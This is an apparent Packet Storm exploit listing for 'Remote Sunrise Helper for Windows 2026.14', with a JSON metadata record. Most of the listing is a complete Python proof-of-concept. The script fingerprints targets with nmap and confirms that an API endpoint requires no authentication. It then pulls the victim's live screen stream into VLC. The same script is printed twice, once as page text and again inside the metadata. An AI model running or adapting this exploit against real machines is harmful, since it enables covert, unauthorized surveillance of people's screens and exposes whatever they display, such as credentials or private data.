📄 Remote Sunrise Helper for Windows 2026.14 Live Screen Capture

Description

Remote Sunrise Helper for Windows 2026.14 suffers from an unauthenticated live screen capture vulnerability...

Basic Information

ID PACKETSTORM:219229

Published Apr 20, 2026 at 00:00

Affected Product

Affected Versions #!/usr/bin/env python3
# Exploit Title: Remote Sunrise Helper for Windows 2026.14 -
Unauthenticated Live Screen Capture
# Date: 2026-04-20
# Exploit Author: Chokri Hammedi
# Software: https://rs.ltd/latest.php?os=win
# Vendor: https://rs.ltd/
# Version: 2026.14
# Tested on: Windows 10 / Windows 11
#
# Identification:
# nmap -p- -T4 <target> --script ssl-cert
# Look for SSL cert with subject: CN=SecureHTTPServer/O=Evgeny Cherpak/C=US

import socket, sys, subprocess, requests, json, urllib3, threading, time,
random
urllib3.disable_warnings()

if len(sys.argv) < 3:
print(f"Usage: {sys.argv[0]} <target_ip> <api_port>")
print(f"Example: {sys.argv[0]} 192.168.1.103 49762")
sys.exit(1)

target = sys.argv[1]
api_port = sys.argv[2]
url = f"https://{target}:{api_port}"

try:
r = requests.get(f"{url}/api/getVersion", headers={"X-LiveView":
"fixed"}, verify=False, timeout=5)
data = r.json()

if data.get("requires.auth") == False:
live_port = data.get("liveview.port")
print(f"[+] VULNERABLE - {target}")
print(f" Host: {data.get('host.name')} | OS:
{data.get('win.version')}")
print(f" Live Port: {live_port}")

local_port = random.randint(10000, 20000)

def stream():
s = socket.socket()
s.bind(('127.0.0.1', local_port))
s.listen(1)
conn, _ = s.accept()

remote = socket.socket()
remote.connect((target, live_port))

delim = bytes([0xF0, 0xDE, 0xBC, 0x0A])
buf = b''

while True:
chunk = remote.recv(65536)
if not chunk:
break
buf += chunk
while True:
idx = buf.find(delim)
if idx == -1:
break
conn.send(buf[:idx])
buf = buf[idx+4:]

threading.Thread(target=stream, daemon=True).start()
time.sleep(1)

subprocess.Popen(['vlc', f'tcp://127.0.0.1:{local_port}',
'--demux=h264', '--no-video-title-show', '--quiet', '--intf', 'dummy'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
print("[+] VLC launched")
input("Press Enter to stop...\n")
else:
print(f"[*] Not vulnerable - authentication required")

except KeyboardInterrupt:
print("\n[+] Stopped")
except Exception as e:
print(f"[-] Error: {e}")

{
    "lastseen": "2026-04-20T15:45:03",
    "description": "Remote Sunrise Helper for Windows 2026.14 suffers from an unauthenticated live screen capture vulnerability...",
    "published": "2026-04-20T00:00:00",
    "modified": "2026-04-20T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Remote Sunrise Helper for Windows 2026.14 Live Screen Capture",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:219229",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "#!/usr/bin/env python3\n    # Exploit Title: Remote Sunrise Helper for Windows 2026.14 -\n    Unauthenticated Live Screen Capture\n    # Date: 2026-04-20\n    # Exploit Author: Chokri Hammedi\n    # Software: https://rs.ltd/latest.php?os=win\n    # Vendor: https://rs.ltd/\n    # Version: 2026.14\n    # Tested on: Windows 10 / Windows 11\n    #\n    # Identification:\n    # nmap -p- -T4 <target> --script ssl-cert\n    # Look for SSL cert with subject: CN=SecureHTTPServer/O=Evgeny Cherpak/C=US\n    \n    import socket, sys, subprocess, requests, json, urllib3, threading, time,\n    random\n    urllib3.disable_warnings()\n    \n    if len(sys.argv) < 3:\n        print(f\"Usage: {sys.argv[0]} <target_ip> <api_port>\")\n        print(f\"Example: {sys.argv[0]} 192.168.1.103 49762\")\n        sys.exit(1)\n    \n    target = sys.argv[1]\n    api_port = sys.argv[2]\n    url = f\"https://{target}:{api_port}\"\n    \n    try:\n        r = requests.get(f\"{url}/api/getVersion\", headers={\"X-LiveView\":\n    \"fixed\"}, verify=False, timeout=5)\n        data = r.json()\n    \n        if data.get(\"requires.auth\") == False:\n            live_port = data.get(\"liveview.port\")\n            print(f\"[+] VULNERABLE - {target}\")\n            print(f\"    Host: {data.get('host.name')} | OS:\n    {data.get('win.version')}\")\n            print(f\"    Live Port: {live_port}\")\n    \n            local_port = random.randint(10000, 20000)\n    \n            def stream():\n                s = socket.socket()\n                s.bind(('127.0.0.1', local_port))\n                s.listen(1)\n                conn, _ = s.accept()\n    \n                remote = socket.socket()\n                remote.connect((target, live_port))\n    \n                delim = bytes([0xF0, 0xDE, 0xBC, 0x0A])\n                buf = b''\n    \n                while True:\n                    chunk = remote.recv(65536)\n                    if not chunk:\n                        break\n                    buf += chunk\n                    while True:\n                        idx = buf.find(delim)\n                        if idx == -1:\n                            break\n                        conn.send(buf[:idx])\n                        buf = buf[idx+4:]\n    \n            threading.Thread(target=stream, daemon=True).start()\n            time.sleep(1)\n    \n            subprocess.Popen(['vlc', f'tcp://127.0.0.1:{local_port}',\n    '--demux=h264', '--no-video-title-show', '--quiet', '--intf', 'dummy'],\n                            stdout=subprocess.DEVNULL,\n    stderr=subprocess.DEVNULL)\n            print(\"[+] VLC launched\")\n            input(\"Press Enter to stop...\\n\")\n        else:\n            print(f\"[*] Not vulnerable - authentication required\")\n    \n    except KeyboardInterrupt:\n        print(\"\\n[+] Stopped\")\n    except Exception as e:\n        print(f\"[-] Error: {e}\")",
    "sourceHref": "https://packetstorm.news/download/219229",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/219229/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

📄 Remote Sunrise Helper for Windows 2026.14 Live Screen Capture_PACKETSTORM:219229

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply